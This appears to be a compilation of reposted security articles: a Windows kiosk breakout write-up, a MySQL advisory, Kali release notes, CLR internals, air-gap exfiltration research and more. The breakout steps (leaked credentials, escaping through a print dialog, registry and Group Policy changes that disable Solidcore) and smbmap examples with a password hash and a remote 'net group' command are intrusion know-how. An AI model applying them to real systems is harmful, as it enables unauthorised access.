Noekeon, BaseKing) have always been. So, maybe better skip ARX? Sursa: https://keccak.team/2017/not_arx.html
-
Breaking out of Restricted Windows Environment ON JUNE 14, 2017 BY WEIRDGIRL Many organizations these days use restricted Windows environments to reduce the attack surface. The more the system is hardened, the fewer functionalities are exposed. I recently ran across such a scenario, where an already hardened system was protected by McAfee Solidcore. Solidcore was preventing users from making any changes to the system, like installing/uninstalling software, running executables, launching applications etc. The system (Windows 7) which I was testing boots right into the application login screen while restricting access to other OS functionality. I could not do anything with that system except restart it. I spent a whole week gathering information about the application and the system, which included social engineering as well. And then I got an entry point to start with: the credentials to log in to the application (the one that gave me a headache for a week) were available on the Internet (thanks to a Google dork). The credentials I got were admin credentials. After logging in to the application there was no way to get out of it and into the base system. The application was so well designed that there was not a single way out. Then I found an option in the application to print a document, clicked on print-->printer settings-->add a printer-->location-->browse location, and got access to the file browser of the host machine. Every Windows file explorer has a Windows help option which provides free help about Windows features. It was possible to open a command prompt from the help option. I was only able to open the command prompt, but not any other Windows application. Even after getting access to the command prompt I was unable to make any changes to the system (not even opening Notepad). Every Windows application that I tried to open ended up with the following error message: The error made it clear that the application is blocked and that it could be enabled either from the registry editor or the group policy editor. However, I did not have access to either of them; Solidcore was blocking both. So I used the following batch script to enable Task Manager, by modifying the relevant registry key (though I didn't know whether it was actually blocked via the registry or via group policy; a reconstruction of the script follows below): And to my surprise I was able to unlock Task Manager. Similarly, I was able to unlock and open Control Panel. My main objective was to disable or uninstall Solidcore, as it was restricting the desktop environment. But the system kept giving me challenges: I was able to uninstall any software except Solidcore. Then there was only one way left to disable Solidcore / enable installation of other software, and that was the Group Policy Editor. However, I didn't have direct access to gpedit, so I used the following way to get to it: Open Task Manager-->File-->New task-->type MMC and press Enter. This opened the Microsoft Management Console. In MMC: File-->Add/Remove snap-in-->select Group Policy Objects and click Add. After this I was able to perform numerous actions like enabling blocked system applications, allowing access to the Desktop, disabling Windows restrictions etc. However, my main objective was to disable Solidcore and find a way to run any Windows executable. The Group Policy editor provides an option to run/block only allowed Windows software.
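As an aside, here is a plausible reconstruction of that Task Manager unlock. The original batch script appears only as an image in the post, so the exact commands may have differed, but enabling Task Manager for the current user amounts to clearing the well-known DisableTaskMgr policy value:

    rem hedged reconstruction -- the original script is not shown in text form
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f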
And this policy can be set in the following way: Group Policy editor-->User Configuration > Administrative Templates > System. On the right side there's the option "Do not run specified windows applications". Click on that: Edit-->select Enabled-->click on the show list of disallowed applications-->then add the application name that you want to block (in my case it was Solidcore). Then click "OK". To apply the changes I restarted my system. In the same way it was possible to enable a list of allowed applications that can run in Windows (which could include malicious software as well). And that's how I was able to break out of a completely restricted desktop environment. Sursa: https://weirdgirlweb.wordpress.com/2017/06/14/first-blog-post/
-
[RHSA-2017:2787-01] Important: rh-mysql56-mysql security and bug fix update From: "Security announcements for all Red Hat products and services." <rhsa-announce@xxxxxxxxxx> To: rhsa-announce@xxxxxxxxxx Date: Thu, 21 Sep 2017 03:43:23 -0400 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: rh-mysql56-mysql security and bug fix update Advisory ID: RHSA-2017:2787-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2017:2787 Issue date: 2017-09-21 CVE Names: CVE-2016-5483 CVE-2016-8327 CVE-2017-3238 CVE-2017-3244 CVE-2017-3257 CVE-2017-3258 CVE-2017-3265 CVE-2017-3273 CVE-2017-3291 CVE-2017-3302 CVE-2017-3305 CVE-2017-3308 CVE-2017-3309 CVE-2017-3312 CVE-2017-3313 CVE-2017-3317 CVE-2017-3318 CVE-2017-3450 CVE-2017-3452 CVE-2017-3453 CVE-2017-3456 CVE-2017-3461 CVE-2017-3462 CVE-2017-3463 CVE-2017-3464 CVE-2017-3599 CVE-2017-3600 CVE-2017-3633 CVE-2017-3634 CVE-2017-3636 CVE-2017-3641 CVE-2017-3647 CVE-2017-3648 CVE-2017-3649 CVE-2017-3651 CVE-2017-3652 CVE-2017-3653 ===================================================================== 1. Summary: An update for rh-mysql56-mysql is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64 3. Description: MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs. The following packages have been upgraded to a later upstream version: rh-mysql56-mysql (5.6.37). Security Fix(es): * An integer overflow flaw leading to a buffer overflow was found in the way MySQL parsed connection handshake packets. An unauthenticated remote attacker with access to the MySQL port could use this flaw to crash the mysqld daemon. (CVE-2017-3599) * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. 
(CVE-2017-3291) * It was discovered that the MySQL client command line tools only checked after authentication whether server supported SSL. A man-in-the-middle attacker could use this flaw to hijack client's authentication to the server even if the client was configured to require SSL connection. (CVE-2017-3305) * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages listed in the References section. (CVE-2016-8327, CVE-2017-3238, CVE-2017-3244, CVE-2017-3257, CVE-2017-3258, CVE-2017-3273, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3450, CVE-2017-3452, CVE-2017-3453, CVE-2017-3456, CVE-2017-3461, CVE-2017-3462, CVE-2017-3463, CVE-2017-3464, CVE-2017-3633, CVE-2017-3634, CVE-2017-3636, CVE-2017-3641, CVE-2017-3647, CVE-2017-3648, CVE-2017-3649, CVE-2017-3651, CVE-2017-3652, CVE-2017-3653) Red Hat would like to thank Pali Rohár for reporting CVE-2017-3305. Bug Fix(es): * Previously, the md5() function was blocked by MySQL in FIPS mode because the MD5 hash algorithm is considered insecure. Consequently, the mysqld daemon failed with error messages when FIPS mode was enabled. With this update, md5() is allowed in FIPS mode for non-security operations. Note that users are able to use md5() for security purposes but such usage is not supported by Red Hat. (BZ#1452469) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing this update, the MySQL server daemon (mysqld) will be restarted automatically. 5. 
Bugs fixed (https://bugzilla.redhat.com/): 1414133 - CVE-2017-3312 mysql: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 fix (CPU Jan 2017) 1414337 - CVE-2016-8327 mysql: Server: Replication unspecified vulnerability (CPU Jan 2017) 1414338 - CVE-2017-3238 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2017) 1414342 - CVE-2017-3244 mysql: Server: DML unspecified vulnerability (CPU Jan 2017) 1414350 - CVE-2017-3257 mysql: Server: InnoDB unspecified vulnerability (CPU Jan 2017) 1414351 - CVE-2017-3258 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) 1414352 - CVE-2017-3273 mysql: Server: DDL unspecified vulnerability (CPU Jan 2017) 1414353 - CVE-2017-3313 mysql: Server: MyISAM unspecified vulnerability (CPU Jan 2017) 1414355 - CVE-2017-3317 mysql: Logging unspecified vulnerability (CPU Jan 2017) 1414357 - CVE-2017-3318 mysql: Server: Error Handling unspecified vulnerability (CPU Jan 2017) 1414423 - CVE-2017-3265 mysql: unsafe chmod/chown use in init script (CPU Jan 2017) 1414429 - CVE-2017-3291 mysql: unrestricted mysqld_safe's ledir (CPU Jan 2017) 1422119 - CVE-2017-3302 mysql: prepared statement handle use-after-free after disconnect 1431690 - CVE-2017-3305 mysql: incorrect enforcement of ssl-mode=REQUIRED in MySQL 5.5 and 5.6 1433010 - CVE-2016-5483 CVE-2017-3600 mariadb, mysql: Incorrect input validation allowing code execution via mysqldump 1443358 - CVE-2017-3308 mysql: Server: DML unspecified vulnerability (CPU Apr 2017) 1443359 - CVE-2017-3309 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443363 - CVE-2017-3450 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2017) 1443364 - CVE-2017-3452 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443365 - CVE-2017-3453 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017) 1443369 - CVE-2017-3456 mysql: Server: DML unspecified vulnerability (CPU Apr 2017) 1443376 - CVE-2017-3461 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443377 - CVE-2017-3462 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443378 - CVE-2017-3463 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017) 1443379 - CVE-2017-3464 mysql: Server: DDL unspecified vulnerability (CPU Apr 2017) 1443386 - CVE-2017-3599 mysql: integer underflow in get_56_lenc_string() leading to DoS (CPU Apr 2017) 1472683 - CVE-2017-3633 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2017) 1472684 - CVE-2017-3634 mysql: Server: DML unspecified vulnerability (CPU Jul 2017) 1472686 - CVE-2017-3636 mysql: Client programs unspecified vulnerability (CPU Jul 2017) 1472693 - CVE-2017-3641 mysql: Server: DML unspecified vulnerability (CPU Jul 2017) 1472703 - CVE-2017-3647 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017) 1472704 - CVE-2017-3648 mysql: Server: Charsets unspecified vulnerability (CPU Jul 2017) 1472705 - CVE-2017-3649 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017) 1472708 - CVE-2017-3651 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2017) 1472710 - CVE-2017-3652 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) 1472711 - CVE-2017-3653 mysql: Server: DDL unspecified vulnerability (CPU Jul 2017) 1477575 - service start fails due to wrong selinux type of logfile 1482122 - Test case failure: /CoreOS/mysql/Regression/bz1149143-mysql-general-log-doesn-t-work-with-FIFO-file Sursa: 
https://mailinglist-archive.mojah.be/redhat-announce/2017-09/msg00048.php
-
How Booking.com manipulates you Published on September 17, 2017; tags: Misc Many websites and applications these days are designed to trick you into doing things that their creators want. Here are some examples from timewellspent.io: YouTube autoplays more videos to keep us from leaving. Instagram shows new likes one at a time, to keep us checking for more. Facebook wants to show whatever keeps us scrolling. Snapchat turns conversations into streaks we don't want to lose. Our media turns events into breaking news to keep us watching. But one of the most manipulative websites I've ever come across is Booking.com, the large hotel search & booking service. If you have ever used Booking.com, you probably noticed (and hopefully resisted!) some ways it nudges you to book whatever property you are looking at: Let's see what's going on here. Prices First, it tries to persuade you that the price is low. "Jackpot! This is the cheapest price you've seen in London for your dates!" Of course it is — this is literally the first price I am seeing for these dates — so that statement is tautological. The first price I see will automatically be the lowest I will have seen, no matter how ridiculously high it's going to be. The statement "This is the highest price you've seen in London for your dates!" would be just as valid. Likewise, the struck-through prices are there to anchor you and make the actual price seem like a great deal. The struck-through US$175 is before applying my 10% "genius" discount — ok, that's fair. But where does the US$189 come from? Let's hover over the price to get an explanation: I imagine most people will feel intimidated by the complex description, skip to the last sentence, and get the impression that "you get the same room for a lower price compared to other check-in dates". (If this weren't the case, Booking.com's marketing department would change the wording to make it so.) But what is it actually saying? If there is only one room of this type, then 90% of the time there will be an appearance of a lucky deal. What you should be reading is "If I choose this, I am not a total loser". And if there are 3 comparable room types with differential pricing, there is even less of a reason to feel good about this — you've successfully avoided the worst 3% of the offerings. Urgency Another way Booking.com manipulates you is by conveying a sense of urgency. "In high demand - only 3 rooms left on our site!" "33 other people looking now, according to our Booking.com travel scientists" (what?) "Last chance! Only 1 room left on our site!" And just to prove they are not kidding, they will show you something that you've missed already: But my favorite one is this red badge: Although it cannot be seen on the screenshot, the badge doesn't appear right away when you open the page. Instead, it pops up one or two seconds later, making it seem like a realtime notification — an impression reinforced by the alarm clock icon. To be clear, it is not realtime, and there is no reason to delay its display other than to trick you: How much time has elapsed since the last booking doesn't simply play on our irrational emotions. It is a valuable piece of information that can be used to estimate the rate at which these rooms are being booked. By a Gott-like argument (see Algorithms to Live By for an excellent explanation), if the last booking was made 4 hours ago, you can estimate that a room is booked about every 8 hours. Plenty of time to relax and compare your options.
If, on the other hand, the last booking happened just two seconds ago, you’d better not waste another second before entering your credit card number. Kudos to Booking for at least providing the actual information in a tooltip window (I wonder what regulations make them do that), but not all users will hover to read it, and even then, something that you experience (a badge popping up) will probably take precedence over what you later read. The “Someone just booked this” badge does not just make you worry that the room you are considering will soon be snatched; it also reassures you. If other people are actively booking this property, it must be good. Of course, the person who made a reservation 4 hours ago has not yet visited the hotel and so probably has little more knowledge than you. Their decision to book is probably to some extent influenced by the same red badge. This situation, where everyone relies on everyone else to have accurate information, is also well described in Algorithms to Live By. Reviews Instead of listening to people who have just booked the property but have not yet visited it, we should turn to those who have been there, right? That’s what reviews are for! But Booking.com managed to game the reviews, too. There are quite a few crappy hotels out there, especially on the cheaper end of the spectrum. These are the hotels you and I would want to avoid, but if we did, Booking would not make money on them. An extreme example is the hotel I’m currently staying at, New Union. From its Booking.com page you wouldn’t think there’s anything wrong with it, would you? If you spend enough time perusing that page, you’ll eventually stumble upon the “fine print”: “noise may be heard whilst the bar is open” is an understatement; the music is so loud that the floor in my room shakes very perceptibly, and the bar is open until late at night/early in the morning. And why is this warning hidden in the fine print instead of being a big red fucking badge? To be fair, this is more of the hotel’s fault than Booking’s. Also, I should have read the fine print. Or the reviews. But wait, I’ve read the reviews: What I didn’t realize skimming an overloaded webpage was that the reviews displayed on the main page had been cherry-picked. The full list of reviews is available from a separate page, e.g. Ratings Notice something interesting here: the first, moderately negative review, gives the place a rating of 7 out of 10, and the second review, probably as negative as it gets, gives it almost a 6. As a result, the overall rating of the property is high (7.6), and even the distribution of ratings does not look alarming: Unlike IMDB or Amazon, where you simply give a movie or product a number of stars, when you rate your stay on Booking.com, you evaluate it on several factors: location, cleanliness, facilities etc. But Booking.com doesn’t present individual ratings; it presents the average (like 7.1 or 5.8), and the average of averages (the overall rating of a property). It is unlikely that all factors will be bad simultaneously, but a problem in one of them may easily ruin your trip. A great location will not compensate for dirty sheets, but Booking.com thinks otherwise. What to do with all of this Frankly, I don’t think I am going to stop using Booking.com. I am not aware of any other service with a comparable number of properties and reviews. 
Instead, we need to be aware of all the ways Booking is trying to screw us over and try to counter them: Ignore urgency-provoking red text and anchoring struck-through prices. Do not rely on the magnitude of the ratings. I think it is still fine to use them as a sorting criterion. Do not read the cherry-picked reviews on the main page. Go to the review page (“Our guests’ experiences”) and sort the reviews from newest to oldest, to get an up-to-date and hopefully unbiased selection. Sursa: https://ro-che.info/articles/2017-09-17-booking-com-manipulation
-
Kali Linux 2017.2 Release September 20, 2017 dookie We are happy to announce the release of Kali Linux 2017.2, available now for your downloading pleasure. This release is a roll-up of all updates and fixes since our 2017.1 release in April. In tangible terms, if you were to install Kali from your 2017.1 ISO, after logging in to the desktop and running 'apt update && apt full-upgrade', you would be faced with something similar to this daunting message: 1399 upgraded, 171 newly installed, 16 to remove and 0 not upgraded. Need to get 1,477 MB of archives. After this operation, 1,231 MB of additional disk space will be used. Do you want to continue? [Y/n] That would make for a whole lot of downloading, unpacking, and configuring of packages. Naturally, these numbers don't tell the entire tale, so read on to see what's new in this release. New and Updated Packages in Kali 2017.2 In addition to all of the standard security and package updates that come to us via Debian Testing, we have also added more than a dozen new tools to the repositories, a few of which are listed below. There are some really nice additions so we encourage you to 'apt install' the ones that pique your interest and check them out. hurl – a useful little hexadecimal and URL encoder/decoder phishery – phishery lets you inject SSL-enabled basic auth phishing URLs into a .docx Word document ssh-audit – an SSH server auditor that checks for encryption types, banners, compression, and more apt2 – an Automated Penetration Testing Toolkit that runs its own scans or imports results from various scanners, and takes action on them bloodhound – uses graph theory to reveal the hidden or unintended relationships within Active Directory crackmapexec – a post-exploitation tool to help automate the assessment of large Active Directory networks dbeaver – powerful GUI database manager that supports the most popular databases, including MySQL, PostgreSQL, Oracle, SQLite, and many more brutespray – automatically attempts default credentials on discovered services On top of all the new packages, this release also includes numerous package updates, including jd-gui, dnsenum, edb-debugger, wpscan, watobo, burpsuite, and many others. To check out the full list of updates and additions, refer to the Kali changelog on our bug tracker. Ongoing Integration Improvements Beyond the new and updated packages in this release, we have also been working towards improving the overall integration of packages in Kali Linux. One area in particular is program usage examples. Many program authors assume that their application will only be run in a certain manner or from a certain location. For example, the SMBmap application has a binary name of 'smbmap', but if you were to look at the usage example, you would see this: Examples: $ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1 $ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20 $ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -h 10.1.3.30 -x 'net group "Domain Admins" /domain' If you were a novice user, you might see these examples, try to run them verbatim, find that they don't work, assume the tool doesn't work, and move on. That would be a shame, because smbmap is an excellent program, so we have been working on fixing these usage discrepancies to help improve the overall fit and finish of the distribution.
If you run 'smbmap' in Kali 2017.2, you will now see this output instead: Examples: $ smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1 $ smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20 $ smbmap -u 'apadmin' -p 'asdf1234!' -d ACME -h 10.1.3.30 -x 'net group "Domain Admins" /domain' We hope that small tweaks like these will help reduce confusion for both veterans and newcomers, and it's something we will continue working towards as time goes on. Learn More About Kali Linux In the time since the release of 2017.1, we also released our first book, Kali Linux Revealed, in both physical and online formats. If you are interested in going far beyond the basics, really want to learn how Kali Linux works, and how you can leverage its many advanced features, we encourage you to check it out. Once you have mastered the material, you will have the foundation required to pursue the Kali Linux Certified Professional certification. Kali ISO Downloads, Virtual Machines and ARM Images The Kali Rolling 2017.2 release can be downloaded via our official Kali Download page. For this release, we have also updated our Kali Virtual Images and Kali ARM Images downloads. As always, if you already have Kali installed and running to your liking, all you need to do in order to get up to date is run the following:

    apt update
    apt dist-upgrade
    reboot

We hope you enjoy this fine release as much as we enjoyed making it! Sursa: https://www.kali.org/news/kali-linux-2017-2-release/
-
Managed object internals, Part 1. The layout Sergey Teplyakov May 26, 2017 The layout of a managed object is pretty simple: a managed object contains instance data, a pointer to metadata (a.k.a. the method table pointer) and a bag of internal information also known as the object header. The first time I read about it, I had a question: why is the layout of an object so weird? Why does a managed reference point into the middle of an object, with the object header at a negative offset? What information is stored in the object header? When I started thinking about the layout and did some quick research, I came up with a few options: 1. The JVM used a similar layout for its managed objects from the inception. It may sound a bit crazy today, but remember that C# has one of the worst features of all time (a.k.a. array covariance) just because Java had it back in the day. Compared to that decision, reusing some ideas about the structure of an object doesn't sound that unreasonable. 2. The object header can grow in size with no cross-cutting changes in the CLR. The object header holds some auxiliary information used by the CLR, and it is possible that the CLR could require more than a pointer-size field. And indeed, the .NET Compact Framework used in mobile phones has different headers for small and large objects (see WP7: CLR Managed Object overhead for more details). The desktop CLR never used this ability, but that doesn't mean it is impossible in the future. 3. Cache line and other performance-related characteristics. Chris Brumme -- one of the CLR architects -- mentioned in a comment on his post "Value Types" that cache friendliness is the very reason for the managed object layout. It is theoretically possible that, due to the cache line size (64 bytes), it is more efficient to access fields that are closer to each other. This would mean that dereferencing the method table pointer followed by an access to some field should show a performance difference depending on the location of the field inside the object. I spent some time trying to prove that this is still true for modern processors, but was unable to produce any benchmark that showed the difference. After spending some time trying to validate my theories, I contacted Vance Morrison with this very question and got the following answer: the current design was made with no particular perf considerations. So, the answer to the question "Why is the managed object layout so weird?" is simple: "historical reasons". And, to be honest, I can see the logic of moving the object header to a negative offset: it emphasizes that this piece of data is an implementation detail of the CLR, that its size can change over time, and that it should not be inspected by a user. Now it's time to inspect the layout in more detail. But before that, let's think about what extra information the CLR could associate with a managed object instance. Here are some ideas: · Special flags that the GC can use to mark that an object is reachable from application roots. · A special flag that notifies the GC that an object is pinned and should not be moved during garbage collection. · The hash code of a managed object (when the GetHashCode method is not overridden). · Critical section and other information used by a lock statement: the thread that acquired the lock, etc. Apart from instance state, the CLR stores a lot of information associated with a type, like the method table, interface maps, instance size and so on, but this is not relevant for our current discussion.
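A conceptual sketch of this layout in C (the field names are mine, not the actual coreclr definitions):

    #include <stdint.h>

    /* Conceptual only -- not the real CLR structure. */
    struct clr_object {
        uintptr_t header;        /* object header: sync block index, hash code, flags */
        uintptr_t method_table;  /* a managed reference points HERE, so the header    */
                                 /* ends up at a negative offset from the reference   */
        /* instance fields follow */
    };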
IsMarked flag The managed object header is a multi-purpose chameleon that can be used for many different purposes. You may think that the garbage collector (GC) uses a bit from the object header to mark that the object is referenced by a root and should be kept alive. This is a common misconception, and a few very famous books are to blame (*). Namely "CLR via C#" by Jeffrey Richter, "Pro .NET Performance" by Sasha Goldstein et al. and, definitely, some others. Instead of using the object header, the CLR authors decided to use one clever trick: the lowest bit of the method table pointer is used to store a flag during garbage collection that the object is reachable and should not be collected. Here is the actual implementation of the 'mark' flag from the coreclr repo, file gc.cpp, line 8974 (**): (**) Unfortunately, the gc.cpp file is so big that github refuses to analyze it. This means that I can't add a hyperlink to a specific line of code. Managed pointers in the CLR heap are aligned on 4-byte or 8-byte address boundaries depending on the platform. This means that 2 or 3 bits of every pointer are always 0 and can be used for other purposes. The same trick is used by the JVM and is called 'Compressed Oops' -- the feature that allows the JVM to have a 32-gigabyte heap and still use 4 bytes per managed pointer. Technically speaking, even on a 32-bit platform there are 2 bits that can be used for flags. Based on a comment in the object.h file, we may think that this is indeed the case and that the second-lowest bit of the method table pointer is used for pinning (to mark that the object should not be moved during the compaction phase of garbage collection). Unfortunately, it is not clear whether this is true or not, because the SetPinned/IsPinned methods from gc.cpp (lines 3850-3859) are implemented based on a reserved bit from the object header, and I was unable to find any code in the coreclr repo that actually sets that bit of the method table pointer. Next time we'll discuss how locks are implemented and will check how expensive they are. Part 1: https://blogs.msdn.microsoft.com/seteplia/2017/05/26/managed-object-internals-part-1-layout/ Part 2: https://blogs.msdn.microsoft.com/seteplia/2017/09/06/managed-object-internals-part-2-object-header-layout-and-the-cost-of-locking/ Part 3: https://blogs.msdn.microsoft.com/seteplia/2017/09/12/managed-object-internals-part-3-the-layout-of-a-managed-array-3/ Part 4: https://blogs.msdn.microsoft.com/seteplia/2017/09/21/managed-object-internals-part-4-fields-layout/
-
CVE-2017-0785 PoC This is just a personal study based on the Android information leak vulnerability released by Armis. Further reading: https://www.armis.com/blueborne/ To run, be sure to have pybluez and pwntools installed. sudo apt-get install bluetooth libbluetooth-dev sudo pip install pybluez sudo pip install pwntools Sursa: https://github.com/ojasookert/CVE-2017-0785
-
Abstract— The continuous discovery of exploitable vulnerabilities in popular applications (e.g., document viewers), along with their heightening protections against control flow hijacking, has opened the door to an often neglected attack strategy—namely, data-only attacks. In this paper, we demonstrate the practicality of the threat posed by data-only attacks that harness the power of memory disclosure vulnerabilities. To do so, we introduce memory cartography, a technique that simplifies the construction of data-only attacks in a reliable manner. Specifically, we show how an adversary can use a provided memory mapping primitive to navigate through process memory at runtime, and safely reach security-critical data that can then be modified at will. We demonstrate this capability by using our cross-platform memory cartography framework implementation to construct data-only exploits against Internet Explorer and Chrome. The outcome of these exploits ranges from simple HTTP cookie leakage, to the alteration of the same origin policy for targeted domains, which enables the cross-origin execution of arbitrary script code. The ease with which we can undermine the security of modern browsers stems from the fact that although isolation policies (such as the same origin policy) are enforced at the script level, these policies are not well reflected in the underlying sandbox process models used for compartmentalization. This gap exists because the complex demands of today's web functionality make the goal of enforcing the same origin policy through process isolation a difficult one to realize in practice, especially when backward compatibility is a priority (e.g., for support of cross-origin IFRAMEs). While fixing the underlying problems likely requires a major refactoring of the security architecture of modern browsers (in the long term), we explore several defenses, including global variable randomization, that can limit the power of the attacks presented herein. Download: https://www3.cs.stonybrook.edu/~mikepo/papers/xfu.eurosp17.pdf
-
osx-config-check Checks your OSX machine against various hardened configuration settings. You can specify your own preferred configuration baseline by supplying your own Hjson file instead of the provided one. Disclaimer The authors of this tool are not responsible if running it breaks stuff; disabling features of your operating system and applications may disrupt normal functionality. Once applied, the security configurations do not guarantee security. You will still need to make good decisions in order to stay secure. The configurations will generally not help you if your computer has been previously compromised. Configurations come from sites like: drduh's OS X Security and Privacy Guide Usage You should download and run this application once for each OS X user account you have on your machine. Each user may be configured differently, and so each should be audited. Download this app using Git, GitHub Desktop, or the "download as zip" option offered by GitHub. If you choose the zip option, unarchive the zip file afterward. In the Terminal application, navigate to the directory that contains this app. You can use the cd command (see example below) to change directories. If you've downloaded the file to your "Downloads" directory, you might find the app here: cd ~/Downloads/osx-config-check If that directory doesn't exist because the folder you retrieved is named slightly differently (such as 'osx-config-check-master' or 'osx-config-check-1.0.0'), you can always type in a portion of the directory name and hit the [TAB] key in Terminal to auto-complete the rest. Next, run the app as follows: python app.py This will take you through a series of interactive steps that check your machine's configuration and offer to fix misconfigurations for you. Intermediate and advanced users can also invoke various command-line arguments: Usage: python app.py [OPTIONS] OPTIONS: --debug-print Enables verbose output for debugging the tool. --report-only Only reports on compliance and does not offer to fix broken configurations. --disable-logs Refrain from creating a log file with the results. --disable-prompt Refrain from prompting user before applying fixes. --skip-sudo-checks Do not perform checks that require sudo privileges. --help -h Print this usage information. Sursa: https://github.com/kristovatlas/osx-config-check
-
Air-Gap Research Page

By Dr. Mordechai Guri
Cyber-Security Research Center
Ben-Gurion University of the Negev, Israel
email: gurim@post.bgu.ac.il (linkedin)

aIR-Jumper (Optical)
"aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR)" Mordechai Guri, Dima Bykhovsky, Yuval Elovici
Paper: http://arxiv.org/abs/1709.05742
Video (infiltration): https://www.youtube.com/watch?v=auoYKSzdOj4
Video (exfiltration): https://www.youtube.com/watch?v=om5fNqKjj2M

xLED (Optical)
Mordechai Guri, Boris Zadov, Andrey Daidakulov, Yuval Elovici. "xLED: Covert Data Exfiltration from Air-Gapped Networks via Router LEDs"
Paper: https://arxiv.org/abs/1706.01140
Or: http://cyber.bgu.ac.il/advanced-cyber/system/files/xLED-Router-Guri_0.pdf
Demo video: https://www.youtube.com/watch?v=mSNt4h7EDKo

AirHopper (Electromagnetic)
Mordechai Guri, Gabi Kedma, Assaf Kachlon, and Yuval Elovici. "AirHopper: Bridging the air-gap between isolated networks and mobile phones using radio frequencies." In Malicious and Unwanted Software: The Americas (MALWARE), 2014 9th International Conference on, pp. 58-67. IEEE, 2014.
Guri, Mordechai, Matan Monitz, and Yuval Elovici. "Bridging the Air Gap between Isolated Networks and Mobile Phones in a Practical Cyber-Attack." ACM Transactions on Intelligent Systems and Technology (TIST) 8, no. 4 (2017): 50.
Demo video: https://www.youtube.com/watch?v=2OzTWiGl1rM&t=20s

BitWhisper (Thermal)
Mordechai Guri, Matan Monitz, Yisroel Mirski, and Yuval Elovici. "Bitwhisper: Covert signaling channel between air-gapped computers using thermal manipulations." In Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 276-289. IEEE, 2015.
Demo video: https://www.youtube.com/watch?v=EWRk51oB-1Y&t=15s

GSMem (Electromagnetic)
Mordechai Guri, Assaf Kachlon, Ofer Hasson, Gabi Kedma, Yisroel Mirsky, and Yuval Elovici. "GSMem: Data exfiltration from air-gapped computers over gsm frequencies." In 24th USENIX Security Symposium (USENIX Security 15), pp. 849-864. 2015.
Demo video: https://www.youtube.com/watch?v=RChj7Mg3rC4

Fansmitter (Acoustic)
Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "Fansmitter: Acoustic Data Exfiltration from (Speakerless) Air-Gapped Computers." arXiv preprint arXiv:1606.05915 (2016).
Demo video: https://www.youtube.com/watch?v=v2_sZIfZkDQ

DiskFiltration (Acoustic)
Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, Yuval Elovici. "Acoustic Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard-Drive Noise ('DiskFiltration')". European Symposium on Research in Computer Security (ESORICS 2017), pp. 98-115.
Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "DiskFiltration: Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard Drive Noise." arXiv preprint arXiv:1608.03431 (2016).
Demo video: https://www.youtube.com/watch?v=H7lQXmSLiP8

USBee (Electromagnetic)
Mordechai Guri, Matan Monitz, and Yuval Elovici. "USBee: Air-Gap Covert-Channel via Electromagnetic Emission from USB." arXiv preprint arXiv:1608.08397 (2016).
